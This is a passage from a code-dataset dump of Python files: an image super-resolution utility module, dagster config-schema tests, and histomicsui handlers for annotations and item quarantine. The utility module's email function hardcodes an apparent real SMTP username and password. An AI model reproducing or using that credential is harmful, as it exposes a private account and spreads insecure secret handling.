"line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 45, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 50, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 57, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 60, "usage_type": "call"}]}
+{"seq_id": "653730760", "text": "import os\r\nimport torch\r\nimport time\r\n\r\n\r\nimport numpy as np \r\nimport yagmail as yg \r\nimport pandas as pd\r\nimport plotly.offline as py\r\nimport plotly.graph_objs as go\r\n\r\nfrom scipy import ndimage\r\nfrom PIL import Image\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\ndef median_pool(img,filter_size):\r\n pool_img = ndimage.median_filter(np.asarray(img)[:,:,:-1],filter_size)\r\n return pool_img\r\n\r\ndef load_data(lr_folder,hr_folder,test_percent=0.33):\r\n # currently using num_train & num_test\r\n # in the future may modified to shuffle and select a portion of all dataset\r\n train_img = []\r\n files = os.listdir(lr_folder)\r\n lr_train, lr_test, hr_train, hr_test = train_test_split(files, files,test_size=test_percent, random_state=42)\r\n for file in lr_train:\r\n pair = []\r\n lr_img = Image.open(os.path.join(lr_folder,file))\r\n# lr_img = Image.fromarray(median_pool(lr_img,3))\r\n lr_img = lr_img.resize((128,128),Image.BICUBIC)\r\n hr_img = Image.open(os.path.join(hr_folder,file))\r\n pair.append(torch.FloatTensor(np.asarray(lr_img)[:,:,0]).view(1,128,128))\r\n pair.append(torch.FloatTensor(np.asarray(hr_img)[:,:,0]).view(1,128,128))\r\n train_img.append(pair)\r\n \r\n test_img = []\r\n for file in lr_test:\r\n pair = []\r\n lr_img = Image.open(os.path.join(lr_folder,file))\r\n# lr_img = Image.fromarray(median_pool(lr_img,3))\r\n lr_img = lr_img.resize((128,128),Image.BICUBIC)\r\n hr_img = Image.open(os.path.join(hr_folder, file))\r\n pair.append(torch.FloatTensor(np.asarray(lr_img)[:,:,0]).view(1,128,128))\r\n pair.append(torch.FloatTensor(np.asarray(hr_img)[:,:,0]).view(1,128,128))\r\n test_img.append(pair)\r\n\r\n return (train_img,test_img)\r\n\r\ndef email_res(reciever,subject=\"run_res\",content=None,attach=None):\r\n try:\r\n yag = yg.SMTP(user='widen1226@163.com',password='1S22S22P63S23P6',\r\n host='smtp.163.com')\r\n yag.send(reciever,subject,content,attachments=attach) \r\n print(\"send result to %s successfully\" % reciever)\r\n except:\r\n print('email did not send due to unknown error')\r\n\r\n\r\ndef plot_loss(train_loss, test_loss, pic_name):\r\n \"\"\"\r\n train_loss: 1*N list\r\n test_loss: 1*N list\r\n pic_name: path to save the plot\r\n \"\"\"\r\n x = np.arange(1,len(train_loss)+1)\r\n trace0 = go.Scatter(\r\n x = x,\r\n y = train_loss,\r\n name = \"train_loss\"\r\n )\r\n trace1 = go.Scatter(\r\n x = x,\r\n y = test_loss,\r\n name = \"test_loss\"\r\n )\r\n layout = dict(title = 'Train Loss v.s. Test Loss',\r\n xaxis = dict(title = 'Num of Epoches'),\r\n yaxis = dict(title = 'MSE Loss'),\r\n )\r\n\r\n data = [trace0, trace1]\r\n fig = dict(data=data, layout=layout)\r\n py.plot(fig, filename=pic_name, auto_open=False)\r\n\r\nif __name__ == '__main__':\r\n train_loss = list(np.random.rand(10))\r\n test_loss = list(np.random.rand(10))\r\n pic_name = \"test.html\"\r\n plot_loss(train_loss, test_loss, pic_name)\r\n", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3079, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "scipy.ndimage.median_filter", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 18, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 31, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 32, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 40, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 40, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 42, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 43, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 45, "usage_type": "call"}, {"api_name": "yagmail.SMTP", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 67, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 72, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 72, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 84, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 84, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}]}
+{"seq_id": "324017370", "text": "from dagster import (\n Array,\n Field,\n ModeDefinition,\n Noneable,\n ScalarUnion,\n Selector,\n Shape,\n pipeline,\n resource,\n solid,\n)\nfrom dagster.config.field import resolve_to_config_type\nfrom dagster.core.meta.config_types import (\n ConfigTypeKind,\n build_config_schema_snapshot,\n meta_from_config_type,\n)\nfrom dagster.core.serdes import deserialize_json_to_dagster_namedtuple, serialize_dagster_namedtuple\n\n\ndef meta_from_dagster_type(dagster_type):\n return meta_from_config_type(resolve_to_config_type(dagster_type))\n\n\ndef test_basic_int_meta():\n int_meta = meta_from_dagster_type(int)\n assert int_meta.given_name == 'Int'\n assert int_meta.key == 'Int'\n assert int_meta.kind == ConfigTypeKind.SCALAR\n assert int_meta.enum_values is None\n assert int_meta.fields is None\n\n\ndef test_basic_dict():\n dict_meta = meta_from_dagster_type({'foo': int})\n assert dict_meta.key.startswith('Shape.')\n assert dict_meta.given_name is None\n child_type_keys = dict_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0] == 'Int'\n assert child_type_keys[0]\n\n assert dict_meta.fields and len(dict_meta.fields) == 1\n\n field = dict_meta.fields[0]\n assert field.name == 'foo'\n\n\ndef test_field_things():\n dict_meta = meta_from_dagster_type(\n {\n 'req': int,\n 'opt': Field(int, is_required=False),\n 'opt_with_default': Field(int, is_required=False, default_value=2),\n 'req_with_desc': Field(int, description='A desc'),\n }\n )\n\n assert dict_meta.fields and len(dict_meta.fields) == 4\n\n field_meta_dict = {field_meta.name: field_meta for field_meta in dict_meta.fields}\n\n assert field_meta_dict['req'].is_required is True\n assert field_meta_dict['req'].description is None\n assert field_meta_dict['opt'].is_required is False\n assert field_meta_dict['opt_with_default'].is_required is False\n assert field_meta_dict['opt_with_default'].default_provided is True\n assert field_meta_dict['opt_with_default'].default_value_as_str == '2'\n\n assert field_meta_dict['req_with_desc'].is_required is True\n assert field_meta_dict['req_with_desc'].description == 'A desc'\n\n\ndef test_basic_list():\n list_meta = meta_from_dagster_type(Array(int))\n assert list_meta.key.startswith('Array')\n child_type_keys = list_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0] == 'Int'\n\n\ndef test_basic_optional():\n optional_meta = meta_from_dagster_type(Noneable(int))\n assert optional_meta.key.startswith('Noneable')\n\n child_type_keys = optional_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0] == 'Int'\n assert optional_meta.kind == ConfigTypeKind.NONEABLE\n assert optional_meta.enum_values is None\n\n\ndef test_basic_list_list():\n list_meta = meta_from_dagster_type([[int]])\n assert list_meta.key.startswith('Array')\n child_type_keys = list_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0] == 'Array.Int'\n assert list_meta.enum_values is None\n\n\ndef test_list_of_dict():\n inner_dict_dagster_type = Shape({'foo': Field(str)})\n list_of_dict_meta = meta_from_dagster_type([inner_dict_dagster_type])\n\n assert list_of_dict_meta.key.startswith('Array')\n child_type_keys = list_of_dict_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0].startswith('Shape')\n\n\ndef test_selector_of_things():\n selector_meta = meta_from_dagster_type(Selector({'bar': Field(int)}))\n assert selector_meta.key.startswith('Selector')\n assert selector_meta.kind == ConfigTypeKind.SELECTOR\n assert selector_meta.fields and len(selector_meta.fields) == 1\n field_meta = selector_meta.fields[0]\n assert field_meta.name == 'bar'\n assert field_meta.type_key == 'Int'\n\n\ndef test_kitchen_sink():\n kitchen_sink = resolve_to_config_type(\n [\n {\n 'opt_list_of_int': Field(int, is_required=False),\n 'nested_dict': {\n 'list_list': [[int]],\n 'nested_selector': Field(\n Selector({'some_field': int, 'more_list': Noneable([bool])})\n ),\n },\n }\n ]\n )\n\n kitchen_sink_meta = meta_from_dagster_type(kitchen_sink)\n\n rehydrated_meta = deserialize_json_to_dagster_namedtuple(\n serialize_dagster_namedtuple(kitchen_sink_meta)\n )\n assert kitchen_sink_meta == rehydrated_meta\n\n\ndef test_simple_pipeline_smoke_test():\n @solid\n def solid_without_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_without_config()\n\n config_schema_snapshot = build_config_schema_snapshot(single_solid_pipeline)\n assert config_schema_snapshot.all_config_metas_by_key\n\n serialized = serialize_dagster_namedtuple(config_schema_snapshot)\n rehydrated_config_schema_snapshot = deserialize_json_to_dagster_namedtuple(serialized)\n assert config_schema_snapshot == rehydrated_config_schema_snapshot\n\n\ndef test_check_solid_config_correct():\n @solid(config={'foo': str})\n def solid_with_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_with_config()\n\n solid_config_key = solid_with_config.config_field.config_type.key\n\n config_metas = build_config_schema_snapshot(single_solid_pipeline).all_config_metas_by_key\n\n assert solid_config_key in config_metas\n\n solid_config_meta = config_metas[solid_config_key]\n\n assert solid_config_meta.kind == ConfigTypeKind.STRICT_SHAPE\n assert len(solid_config_meta.fields) == 1\n\n foo_field = solid_config_meta.fields[0]\n\n assert foo_field.name == 'foo'\n assert foo_field.type_key == 'String'\n\n\ndef test_check_solid_list_list_config_correct():\n @solid(config={'list_list_int': [[{'bar': int}]]})\n def solid_with_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_with_config()\n\n solid_config_key = solid_with_config.config_field.config_type.key\n\n config_metas = build_config_schema_snapshot(single_solid_pipeline).all_config_metas_by_key\n assert solid_config_key in config_metas\n solid_config_meta = config_metas[solid_config_key]\n\n assert solid_config_meta.kind == ConfigTypeKind.STRICT_SHAPE\n assert len(solid_config_meta.fields) == 1\n\n list_list_field = solid_config_meta.fields[0]\n\n list_list_type_key = list_list_field.type_key\n\n assert list_list_type_key.startswith('Array.Array.')\n\n list_list_type = config_metas[list_list_type_key]\n\n assert list_list_type.kind == ConfigTypeKind.ARRAY\n list_meta = config_metas[list_list_type.inner_type_key]\n assert list_meta.kind == ConfigTypeKind.ARRAY\n assert config_metas[list_meta.inner_type_key].kind == ConfigTypeKind.STRICT_SHAPE\n\n\ndef test_kitchen_sink_break_out():\n @solid(\n config=[\n {\n 'opt_list_of_int': Field([int], is_required=False),\n 'nested_dict': {\n 'list_list': [[int]],\n 'nested_selector': Selector(\n {'some_field': int, 'noneable_list': Noneable([bool])}\n ),\n },\n }\n ]\n )\n def solid_with_kitchen_sink_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_with_kitchen_sink_config()\n\n config_metas = build_config_schema_snapshot(single_solid_pipeline).all_config_metas_by_key\n\n solid_config_key = solid_with_kitchen_sink_config.config_field.config_type.key\n assert solid_config_key in config_metas\n solid_config_meta = config_metas[solid_config_key]\n\n assert solid_config_meta.kind == ConfigTypeKind.ARRAY\n\n dict_within_list = config_metas[solid_config_meta.inner_type_key]\n\n assert len(dict_within_list.fields) == 2\n\n opt_field = dict_within_list.get_field('opt_list_of_int')\n\n assert opt_field.is_required is False\n assert config_metas[opt_field.type_key].kind == ConfigTypeKind.ARRAY\n\n nested_dict = config_metas[dict_within_list.get_field('nested_dict').type_key]\n assert len(nested_dict.fields) == 2\n nested_selector = config_metas[nested_dict.get_field('nested_selector').type_key]\n noneable_list_bool = config_metas[nested_selector.get_field('noneable_list').type_key]\n assert noneable_list_bool.kind == ConfigTypeKind.NONEABLE\n list_bool = config_metas[noneable_list_bool.inner_type_key]\n assert list_bool.kind == ConfigTypeKind.ARRAY\n\n\ndef test_multiple_modes():\n @solid\n def noop_solid(_):\n pass\n\n @resource(config={'a': int})\n def a_resource(_):\n pass\n\n @resource(config={'b': int})\n def b_resource(_):\n pass\n\n @pipeline(\n mode_defs=[\n ModeDefinition(name='mode_a', resource_defs={'resource': a_resource}),\n ModeDefinition(name='mode_b', resource_defs={'resource': b_resource}),\n ]\n )\n def modez():\n noop_solid()\n\n config_metas = build_config_schema_snapshot(modez).all_config_metas_by_key\n\n assert a_resource.config_field.config_type.key in config_metas\n assert b_resource.config_field.config_type.key in config_metas\n\n assert get_config_meta(modez, a_resource.config_field.config_type.key)\n assert get_config_meta(modez, b_resource.config_field.config_type.key)\n\n\ndef get_config_meta(pipeline_def, key):\n return pipeline_def.get_pipeline_snapshot().config_schema_snapshot.get_config_meta(key)\n\n\ndef test_scalar_union():\n # Requiring resolve calls is bad: https://github.com/dagster-io/dagster/issues/2266\n @solid(config=ScalarUnion(resolve_to_config_type(str), resolve_to_config_type({'bar': str})))\n def solid_with_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_with_config()\n\n config_metas = build_config_schema_snapshot(single_solid_pipeline).all_config_metas_by_key\n\n scalar_union_key = solid_with_config.config_field.config_type.key\n\n assert scalar_union_key in config_metas\n\n assert config_metas[config_metas[scalar_union_key].scalar_type_key].key == 'String'\n assert (\n config_metas[config_metas[scalar_union_key].non_scalar_type_key].kind\n == ConfigTypeKind.STRICT_SHAPE\n )\n", "sub_path": "python_modules/dagster/dagster_tests/core_tests/meta_tests/test_config_type_metas.py", "file_name": "test_config_type_metas.py", "file_ext": "py", "file_size_in_byte": 10480, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "dagster.core.meta.config_types.meta_from_config_type", "line_number": 23, "usage_type": "call"}, {"api_name": "dagster.config.field.resolve_to_config_type", "line_number": 23, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.SCALAR", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 30, "usage_type": "name"}, {"api_name": "dagster.Field", "line_number": 55, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 56, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 57, "usage_type": "call"}, {"api_name": "dagster.Array", "line_number": 77, "usage_type": "call"}, {"api_name": "dagster.Noneable", "line_number": 86, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.NONEABLE", "line_number": 93, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 93, "usage_type": "name"}, {"api_name": "dagster.Shape", "line_number": 108, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 108, "usage_type": "call"}, {"api_name": "dagster.Selector", "line_number": 119, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 119, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.SELECTOR", "line_number": 121, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 121, "usage_type": "name"}, {"api_name": "dagster.config.field.resolve_to_config_type", "line_number": 129, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 132, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 135, "usage_type": "call"}, {"api_name": "dagster.Selector", "line_number": 136, "usage_type": "call"}, {"api_name": "dagster.Noneable", "line_number": 136, "usage_type": "call"}, {"api_name": "dagster.core.serdes.deserialize_json_to_dagster_namedtuple", "line_number": 145, "usage_type": "call"}, {"api_name": "dagster.core.serdes.serialize_dagster_namedtuple", "line_number": 146, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 152, "usage_type": "name"}, {"api_name": "dagster.pipeline", "line_number": 156, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 160, "usage_type": "call"}, {"api_name": "dagster.core.serdes.serialize_dagster_namedtuple", "line_number": 163, "usage_type": "call"}, {"api_name": "dagster.core.serdes.deserialize_json_to_dagster_namedtuple", "line_number": 164, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 169, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 173, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 179, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.STRICT_SHAPE", "line_number": 185, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 185, "usage_type": "name"}, {"api_name": "dagster.solid", "line_number": 195, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 199, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 205, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.STRICT_SHAPE", "line_number": 209, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 209, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 220, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 220, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 222, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 222, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.STRICT_SHAPE", "line_number": 223, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 223, "usage_type": "name"}, {"api_name": "dagster.solid", "line_number": 227, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 230, "usage_type": "call"}, {"api_name": "dagster.Selector", "line_number": 233, "usage_type": "call"}, {"api_name": "dagster.Noneable", "line_number": 234, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 243, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 247, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 253, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 253, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 262, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 262, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.NONEABLE", "line_number": 268, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 268, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 270, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 270, "usage_type": "name"}, {"api_name": "dagster.solid", "line_number": 274, "usage_type": "name"}, {"api_name": "dagster.resource", "line_number": 278, "usage_type": "call"}, {"api_name": "dagster.resource", "line_number": 282, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 286, "usage_type": "call"}, {"api_name": "dagster.ModeDefinition", "line_number": 288, "usage_type": "call"}, {"api_name": "dagster.ModeDefinition", "line_number": 289, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 295, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 310, "usage_type": "call"}, {"api_name": "dagster.ScalarUnion", "line_number": 310, "usage_type": "call"}, {"api_name": "dagster.config.field.resolve_to_config_type", "line_number": 310, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 314, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 318, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.STRICT_SHAPE", "line_number": 327, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 327, "usage_type": "name"}]}
+{"seq_id": "647134160", "text": "import datetime\nimport json\n\nfrom girder import logger\nfrom girder.constants import AccessType\nfrom girder.exceptions import RestException\nfrom girder.models.file import File\nfrom girder.models.folder import Folder\nfrom girder.models.item import Item\nfrom girder.models.setting import Setting\nfrom girder.models.user import User\nfrom girder_large_image_annotation.models.annotation import Annotation\n\nfrom .constants import PluginSettings\n\n\ndef _itemFromEvent(event, identifierEnding, itemAccessLevel=AccessType.READ):\n \"\"\"\n If an event has a reference and an associated identifier that ends with a\n specific string, return the associated item, user, and image file.\n\n :param event: the data.process event.\n :param identifierEnding: the required end of the identifier.\n :returns: a dictionary with item, user, and file if there was a match.\n \"\"\"\n info = event.info\n identifier = None\n reference = info.get('reference', None)\n if reference is not None:\n try:\n reference = json.loads(reference)\n if (isinstance(reference, dict) and\n isinstance(reference.get('identifier'), str)):\n identifier = reference['identifier']\n except (ValueError, TypeError):\n logger.debug('Failed to parse data.process reference: %r', reference)\n if identifier is not None and identifier.endswith(identifierEnding):\n if 'userId' not in reference or 'itemId' not in reference or 'fileId' not in reference:\n logger.error('Reference does not contain required information.')\n return\n\n userId = reference['userId']\n imageId = reference['fileId']\n\n # load models from the database\n user = User().load(userId, force=True)\n image = File().load(imageId, level=AccessType.READ, user=user)\n item = Item().load(image['itemId'], level=itemAccessLevel, user=user)\n return {'item': item, 'user': user, 'file': image}\n\n\ndef process_annotations(event):\n \"\"\"Add annotations to an image on a ``data.process`` event\"\"\"\n results = _itemFromEvent(event, 'AnnotationFile')\n if not results:\n return\n item = results['item']\n user = results['user']\n\n file = File().load(\n event.info.get('file', {}).get('_id'),\n level=AccessType.READ, user=user\n )\n\n if not file:\n logger.error('Could not load models from the database')\n return\n try:\n data = json.loads(b''.join(File().download(file)()).decode('utf8'))\n except Exception:\n logger.error('Could not parse annotation file')\n raise\n\n if not isinstance(data, list):\n data = [data]\n for annotation in data:\n try:\n Annotation().createAnnotation(item, user, annotation)\n except Exception:\n logger.error('Could not create annotation object from data')\n raise\n\n\ndef quarantine_item(item, user, makePlaceholder=True):\n \"\"\"\n Quarantine an item, marking which user did it. Note that this raises\n RestExceptions for failures.\n\n :param user: the user doing the quarantining.\n :param item: an item to quarantine.\n :returns: the modified item.\n \"\"\"\n folder = Setting().get(PluginSettings.HUI_QUARANTINE_FOLDER)\n if not folder:\n raise RestException('The quarantine folder is not configured.')\n folder = Folder().load(folder, force=True, exc=True)\n if not folder:\n raise RestException('The quarantine folder does not exist.')\n if str(folder['_id']) == str(item['folderId']):\n raise RestException('The item is already in the quarantine folder.')\n originalFolder = Folder().load(item['folderId'], force=True)\n quarantineInfo = {\n 'originalFolderId': item['folderId'],\n 'originalBaseParentType': item['baseParentType'],\n 'originalBaseParentId': item['baseParentId'],\n 'originalUpdated': item['updated'],\n 'quarantineUserId': user['_id'],\n 'quarantineTime': datetime.datetime.utcnow()\n }\n item = Item().move(item, folder)\n if makePlaceholder:\n placeholder = Item().createItem(\n item['name'] + ' [Removed - Quarantined]',\n {'_id': item['creatorId']}, originalFolder,\n description=item['description'])\n quarantineInfo['placeholderItemId'] = placeholder['_id']\n item.setdefault('meta', {})['quarantine'] = quarantineInfo\n item = Item().updateItem(item)\n if makePlaceholder:\n placeholderInfo = {\n 'quarantined': True,\n 'quarantineTime': quarantineInfo['quarantineTime']\n }\n placeholder.setdefault('meta', {})['quarantine'] = placeholderInfo\n placeholder = Item().updateItem(placeholder)\n return item\n\n\ndef restore_quarantine_item(item, user):\n \"\"\"\n Unquarantine an item, returning it to its original location. Note that\n this raises RestExceptions for failures.\n\n :param item: an item to unquarantine.\n :returns: the modified item.\n \"\"\"\n if not item.get('meta', {}).get('quarantine'):\n raise RestException('The item has no quarantine record.')\n folder = Folder().load(item['meta']['quarantine']['originalFolderId'], force=True)\n if not folder:\n raise RestException('The original folder is not accessible.')\n if 'placeholderItemId' in item['meta']['quarantine']:\n placeholder = Item().load(item['meta']['quarantine']['placeholderItemId'], force=True)\n else:\n placeholder = None\n item = Item().move(item, folder)\n item['updated'] = item['meta']['quarantine']['originalUpdated']\n del item['meta']['quarantine']\n item = Item().updateItem(item)\n if placeholder is not None:\n Item().remove(placeholder)\n return item\n\n\ndef process_metadata(event):\n \"\"\"Add metadata to an item on a ``data.process`` event\"\"\"\n results = _itemFromEvent(event, 'ItemMetadata', AccessType.WRITE)\n if not results:\n return\n file = File().load(\n event.info.get('file', {}).get('_id'),\n level=AccessType.READ, user=results['user']\n )\n\n if not file:\n logger.error('Could not load models from the database')\n return\n try:\n data = json.loads(b''.join(File().download(file)()).decode('utf8'))\n except Exception:\n logger.error('Could not parse metadata file')\n raise\n\n item = results['item']\n Item().setMetadata(item, data, allowNull=False)\n", "sub_path": "histomicsui/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 6412, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "girder.constants.AccessType.READ", "line_number": 17, "usage_type": "attribute"}, {"api_name": 